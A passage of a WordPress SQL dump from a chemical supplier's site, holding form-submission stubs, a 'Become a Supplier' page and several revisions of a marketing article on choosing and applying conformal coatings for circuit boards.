INSERT INTO `wp_posts` VALUES (4752, 0, '2017-07-28 08:00:08', '2017-07-28 08:00:08', '', '', '', 'publish', 'closed', 'closed', '', '4752', '', '', '2017-07-28 08:00:09', '2017-07-28 08:00:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/4752/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4753, 0, '2017-07-28 09:18:03', '2017-07-28 09:18:03', '', '', '', 'publish', 'closed', 'closed', '', '4753', '', '', '2017-07-28 09:18:03', '2017-07-28 09:18:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/4753/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4754, 0, '2017-07-28 09:55:17', '2017-07-28 09:55:17', '', '', '', 'publish', 'closed', 'closed', '', '4754', '', '', '2017-07-28 09:55:18', '2017-07-28 09:55:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/4754/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4755, 0, '2017-07-28 18:02:23', '2017-07-28 18:02:23', '', '', '', 'publish', 'closed', 'closed', '', '4755', '', '', '2017-07-28 18:02:23', '2017-07-28 18:02:23', '', 0, 'https://www.miller-stephenson.com/nf_sub/4755/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4756, 0, '2017-07-29 10:56:40', '2017-07-29 10:56:40', '', '', '', 'publish', 'closed', 'closed', '', '4756', '', '', '2017-07-29 10:56:40', '2017-07-29 10:56:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/4756/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4757, 0, '2017-07-31 06:54:58', '2017-07-31 06:54:58', '', '', '', 'publish', 'closed', 'closed', '', '4757', '', '', '2017-07-31 06:54:59', '2017-07-31 06:54:59', '', 0, 'https://www.miller-stephenson.com/nf_sub/4757/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4758, 0, '2017-07-31 09:11:51', '2017-07-31 09:11:51', '', '', '', 'publish', 'closed', 'closed', '', '4758', '', '', '2017-07-31 09:11:52', '2017-07-31 09:11:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/4758/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4760, 1, '2017-07-31 13:15:52', '2017-07-31 13:15:52', '', '', '', 'publish', 'closed', 'closed', '', '4760', '', '', '2017-07-31 13:15:53', '2017-07-31 13:15:53', '', 0, 'https://www.miller-stephenson.com/nf_sub/4760/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4764, 0, '2017-07-31 13:40:02', '2017-07-31 13:40:02', '', '', '', 'publish', 'closed', 'closed', '', '4764', '', '', '2017-07-31 13:40:02', '2017-07-31 13:40:02', '', 0, 'https://www.miller-stephenson.com/nf_sub/4764/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4765, 0, '2017-07-31 14:32:22', '2017-07-31 14:32:22', '', '', '', 'publish', 'closed', 'closed', '', '4765', '', '', '2017-07-31 14:32:22', '2017-07-31 14:32:22', '', 0, 'https://www.miller-stephenson.com/nf_sub/4765/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4766, 0, '2017-07-31 21:04:26', '2017-07-31 21:04:26', '', '', '', 'publish', 'closed', 'closed', '', '4766', '', '', '2017-07-31 21:04:27', '2017-07-31 21:04:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/4766/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4767, 0, '2017-07-31 21:25:13', '2017-07-31 21:25:13', '', '', '', 'publish', 'closed', 'closed', '', '4767', '', '', '2017-07-31 21:25:14', '2017-07-31 21:25:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/4767/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4768, 0, '2017-08-01 02:05:44', '2017-08-01 02:05:44', '', '', '', 'publish', 'closed', 'closed', '', '4768', '', '', '2017-08-01 02:05:44', '2017-08-01 02:05:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/4768/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4769, 0, '2017-08-01 08:38:09', '2017-08-01 08:38:09', '', '', '', 'publish', 'closed', 'closed', '', '4769', '', '', '2017-08-01 08:38:09', '2017-08-01 08:38:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/4769/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4770, 0, '2017-08-01 13:55:07', '2017-08-01 13:55:07', '', '', '', 'publish', 'closed', 'closed', '', '4770', '', '', '2017-08-01 13:55:07', '2017-08-01 13:55:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/4770/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4771, 0, '2017-08-01 16:00:03', '2017-08-01 16:00:03', '', '', '', 'publish', 'closed', 'closed', '', '4771', '', '', '2017-08-01 16:00:03', '2017-08-01 16:00:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/4771/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4772, 0, '2017-08-01 19:27:12', '2017-08-01 19:27:12', '', '', '', 'publish', 'closed', 'closed', '', '4772', '', '', '2017-08-01 19:27:12', '2017-08-01 19:27:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/4772/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4773, 0, '2017-08-01 21:05:30', '2017-08-01 21:05:30', '', '', '', 'publish', 'closed', 'closed', '', '4773', '', '', '2017-08-01 21:05:30', '2017-08-01 21:05:30', '', 0, 'https://www.miller-stephenson.com/nf_sub/4773/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4774, 0, '2017-08-01 23:53:09', '2017-08-01 23:53:09', '', '', '', 'publish', 'closed', 'closed', '', '4774', '', '', '2017-08-01 23:53:10', '2017-08-01 23:53:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/4774/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4775, 0, '2017-08-02 15:09:26', '2017-08-02 15:09:26', '', '', '', 'publish', 'closed', 'closed', '', '4775', '', '', '2017-08-02 15:09:26', '2017-08-02 15:09:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/4775/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4776, 0, '2017-08-02 15:09:35', '2017-08-02 15:09:35', '', '', '', 'publish', 'closed', 'closed', '', '4776', '', '', '2017-08-02 15:09:35', '2017-08-02 15:09:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/4776/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4777, 0, '2017-08-02 17:22:19', '2017-08-02 17:22:19', '', '', '', 'publish', 'closed', 'closed', '', '4777', '', '', '2017-08-02 17:22:20', '2017-08-02 17:22:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/4777/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4778, 0, '2017-08-02 19:13:40', '2017-08-02 19:13:40', '', '', '', 'publish', 'closed', 'closed', '', '4778', '', '', '2017-08-02 19:13:40', '2017-08-02 19:13:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/4778/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4779, 0, '2017-08-02 21:12:45', '2017-08-02 21:12:45', '', '', '', 'publish', 'closed', 'closed', '', '4779', '', '', '2017-08-02 21:12:46', '2017-08-02 21:12:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/4779/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4780, 0, '2017-08-03 14:45:17', '2017-08-03 14:45:17', '', '', '', 'publish', 'closed', 'closed', '', '4780', '', '', '2017-08-03 14:45:18', '2017-08-03 14:45:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/4780/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4781, 0, '2017-08-03 19:40:10', '2017-08-03 19:40:10', '', '', '', 'publish', 'closed', 'closed', '', '4781', '', '', '2017-08-03 19:40:11', '2017-08-03 19:40:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/4781/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4782, 0, '2017-08-04 07:17:27', '2017-08-04 07:17:27', '', '', '', 'publish', 'closed', 'closed', '', '4782', '', '', '2017-08-04 07:17:27', '2017-08-04 07:17:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/4782/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4783, 0, '2017-08-04 08:09:15', '2017-08-04 08:09:15', '', '', '', 'publish', 'closed', 'closed', '', '4783', '', '', '2017-08-04 08:09:15', '2017-08-04 08:09:15', '', 0, 'https://www.miller-stephenson.com/nf_sub/4783/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4784, 0, '2017-08-04 20:30:21', '2017-08-04 20:30:21', '', '', '', 'publish', 'closed', 'closed', '', '4784', '', '', '2017-08-04 20:30:21', '2017-08-04 20:30:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/4784/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4785, 0, '2017-08-05 10:40:04', '2017-08-05 10:40:04', '', '', '', 'publish', 'closed', 'closed', '', '4785', '', '', '2017-08-05 10:40:05', '2017-08-05 10:40:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/4785/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4786, 0, '2017-08-07 02:19:03', '2017-08-07 02:19:03', '', '', '', 'publish', 'closed', 'closed', '', '4786', '', '', '2017-08-07 02:19:03', '2017-08-07 02:19:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/4786/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4787, 0, '2017-08-07 10:14:50', '2017-08-07 10:14:50', '', '', '', 'publish', 'closed', 'closed', '', '4787', '', '', '2017-08-07 10:14:50', '2017-08-07 10:14:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/4787/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4788, 0, '2017-08-07 14:57:37', '2017-08-07 14:57:37', '', '', '', 'publish', 'closed', 'closed', '', '4788', '', '', '2017-08-07 14:57:37', '2017-08-07 14:57:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/4788/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4789, 2181, '2017-08-07 18:54:28', '2017-08-07 18:54:28', '', '', '', 'publish', 'closed', 'closed', '', '4789', '', '', '2017-08-07 18:54:28', '2017-08-07 18:54:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/4789/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4790, 2, '2017-08-08 14:05:49', '2017-08-08 14:05:49', 'Please fill out the form below to become a supplier. After review, our team will reach out to your company. Our reviewing process takes up to 10 business days.\r\n\r\nIf approved, we will send you a file that will include product images, descriptions, specifications, applications, technical data, and pricing in a CSV format.\r\n\r\n[ninja_forms id=18]', 'Become a Supplier', '', 'publish', 'closed', 'closed', '', 'become-a-supplier', '', '', '2017-08-08 15:37:47', '2017-08-08 15:37:47', '', 0, 'https://www.miller-stephenson.com/?page_id=4790', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (4791, 0, '2017-08-08 13:55:59', '2017-08-08 13:55:59', '', '', '', 'publish', 'closed', 'closed', '', '4791', '', '', '2017-08-08 13:56:00', '2017-08-08 13:56:00', '', 0, 'https://www.miller-stephenson.com/nf_sub/4791/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4792, 2, '2017-08-08 14:05:50', '2017-08-08 14:05:50', ' ', '', '', 'publish', 'closed', 'closed', '', '4792', '', '', '2017-08-08 14:05:50', '2017-08-08 14:05:50', '', 0, 'https://www.miller-stephenson.com/4792/', 13, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4793, 2, '2017-08-08 14:05:49', '2017-08-08 14:05:49', '[ninja_forms id=18]', 'Become a Supplier', '', 'inherit', 'closed', 'closed', '', '4790-revision-v1', '', '', '2017-08-08 14:05:49', '2017-08-08 14:05:49', '', 4790, 'https://www.miller-stephenson.com/4790-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4795, 2, '2017-08-08 14:08:18', '2017-08-08 14:08:18', '', '', '', 'publish', 'closed', 'closed', '', '4795', '', '', '2017-08-08 14:08:19', '2017-08-08 14:08:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/4795/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4802, 2, '2017-08-08 14:40:23', '2017-08-08 14:40:23', 'Please fill out the form below to become a supplier. After review, our team will reach out to your company. Our reviewing process takes up to 10 business days.\r\n\r\n[ninja_forms id=18]', 'Become a Supplier', '', 'inherit', 'closed', 'closed', '', '4790-revision-v1', '', '', '2017-08-08 14:40:23', '2017-08-08 14:40:23', '', 4790, 'https://www.miller-stephenson.com/4790-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4805, 2, '2017-08-08 15:37:45', '2017-08-08 15:37:45', 'Please fill out the form below to become a supplier. After review, our team will reach out to your company. Our reviewing process takes up to 10 business days.\n\nIf approved, we will send you a file that will include product images, descriptions, specifications, applications, technical data, and pricing in a CSV format.\n\n[ninja_forms id=18]', 'Become a Supplier', '', 'inherit', 'closed', 'closed', '', '4790-autosave-v1', '', '', '2017-08-08 15:37:45', '2017-08-08 15:37:45', '', 4790, 'https://www.miller-stephenson.com/4790-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4806, 2, '2017-08-08 15:37:47', '2017-08-08 15:37:47', 'Please fill out the form below to become a supplier. After review, our team will reach out to your company. Our reviewing process takes up to 10 business days.\r\n\r\nIf approved, we will send you a file that will include product images, descriptions, specifications, applications, technical data, and pricing in a CSV format.\r\n\r\n[ninja_forms id=18]', 'Become a Supplier', '', 'inherit', 'closed', 'closed', '', '4790-revision-v1', '', '', '2017-08-08 15:37:47', '2017-08-08 15:37:47', '', 4790, 'https://www.miller-stephenson.com/4790-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4807, 0, '2017-08-09 10:29:20', '2017-08-09 10:29:20', '', '', '', 'publish', 'closed', 'closed', '', '4807', '', '', '2017-08-09 10:29:20', '2017-08-09 10:29:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/4807/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4808, 0, '2017-08-09 17:36:13', '2017-08-09 17:36:13', '', '', '', 'publish', 'closed', 'closed', '', '4808', '', '', '2017-08-09 17:36:14', '2017-08-09 17:36:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/4808/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4809, 2, '2017-08-09 22:49:18', '2017-08-09 22:49:18', '<h2><strong>How Miller-Stephenson can help you choose the right Conformal Coating</strong></h2>\r\nMiller-Stephenson offers a complete series of electronic conformal coatings to meet any applicators protection requirements.  Urethane, Acrylic, Silicone, and Varnish coatings are available, each exhibiting specific chemical, mechanical and moisture resistance. Formulated with high performance base resins, Miller-Stephenson\'s conformal coatings promote extended service life and enhanced reliability for your PCB components and assemblies. Conformal coatings are particularly useful for protecting circuitry in severe service environments, while maintaining a low stress environment for components and connections. These severe conditions range from every day temperature and humidity extremes seen in consumer electronics, to the more harsh automotive underhood applications, up to the extremes demanded in military or industrial applications. All of our formulations are 100% nonflammable and available in both an aerosol and bulk packaging.\r\n<h2><strong>What are Conformal Coatings?</strong></h2>\r\nConformal coatings are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings : Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\n<h2><strong>Types of Conformal Coatings:</strong></h2>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like <a href="https://www.miller-stephenson.com/product/conformal-coating-stripper/">MS-114</a> Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish conformal coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n<h2><strong><img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />Applying Conformal Coatings:</strong></h2>\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as <a href="http://www.nordson.com/en/divisions/asymtek">Asymtek</a>. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular leveling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\nThese products can also be found on Ellsworth <a href="https://www.ellsworth.com/products/conformal-coatings/polyurethane/miller-stephenson-ms-470c-urethane-conformal-coating-clear-14-oz-aerosol/">here.</a>', 'Choosing the Right Conformal Coatings', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2017-08-09 22:49:18', '2017-08-09 22:49:18', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4810, 2, '2017-08-09 22:55:33', '2017-08-09 22:55:33', '<h2><strong>How Miller-Stephenson can help you choose the right Conformal Coating</strong></h2>\r\nMiller-Stephenson offers a complete series of electronic conformal coatings to meet any applicators protection requirements.  Urethane, Acrylic, Silicone, and Varnish coatings are available, each exhibiting specific chemical, mechanical and moisture resistance. Formulated with high performance base resins, Miller-Stephenson\'s conformal coatings promote extended service life and enhanced reliability for your PCB components and assemblies. Conformal coatings are particularly useful for protecting circuitry in severe service environments, while maintaining a low stress environment for components and connections. These severe conditions range from every day temperature and humidity extremes seen in consumer electronics, to the more harsh automotive underhood applications, up to the extremes demanded in military or industrial applications. All of our formulations are 100% nonflammable and available in both an aerosol and bulk packaging.\r\n<h2><strong>What are Conformal Coatings?</strong></h2>\r\nConformal coatings are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings : Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\n<h2><strong>Types of Conformal Coating:</strong></h2>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like <a href="https://www.miller-stephenson.com/product/conformal-coating-stripper/">MS-114</a> Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish conformal coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n<h2><strong><img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />Applying Conformal Coatings:</strong></h2>\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as <a href="http://www.nordson.com/en/divisions/asymtek">Asymtek</a>. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular leveling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\nThese products can also be found on Ellsworth <a href="https://www.ellsworth.com/products/conformal-coatings/polyurethane/miller-stephenson-ms-470c-urethane-conformal-coating-clear-14-oz-aerosol/">here.</a>', 'Choosing the Right Conformal Coatings', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2017-08-09 22:55:33', '2017-08-09 22:55:33', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4811, 2, '2017-08-09 22:59:44', '2017-08-09 22:59:44', '<h2><strong>How Miller-Stephenson can help you choose the right Conformal Coating</strong></h2>\r\nMiller-Stephenson offers a complete series of electronic conformal coatings to meet any applicators protection requirements.  Urethane, Acrylic, Silicone, and Varnish coatings are available, each exhibiting specific chemical, mechanical and moisture resistance. Formulated with high performance base resins, Miller-Stephenson\'s conformal coatings promote extended service life and enhanced reliability for your PCB components and assemblies. Conformal coatings are particularly useful for protecting circuitry in severe service environments, while maintaining a low stress environment for components and connections. These severe conditions range from every day temperature and humidity extremes seen in consumer electronics, to the more harsh automotive underhood applications, up to the extremes demanded in military or industrial applications. All of our formulations are 100% nonflammable and available in both an aerosol and bulk packaging.\r\n<h2><strong>What are Conformal Coatings?</strong></h2>\r\nConformal coatings are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings : Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\n<h2><strong>Types of Conformal Coating:</strong></h2>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a 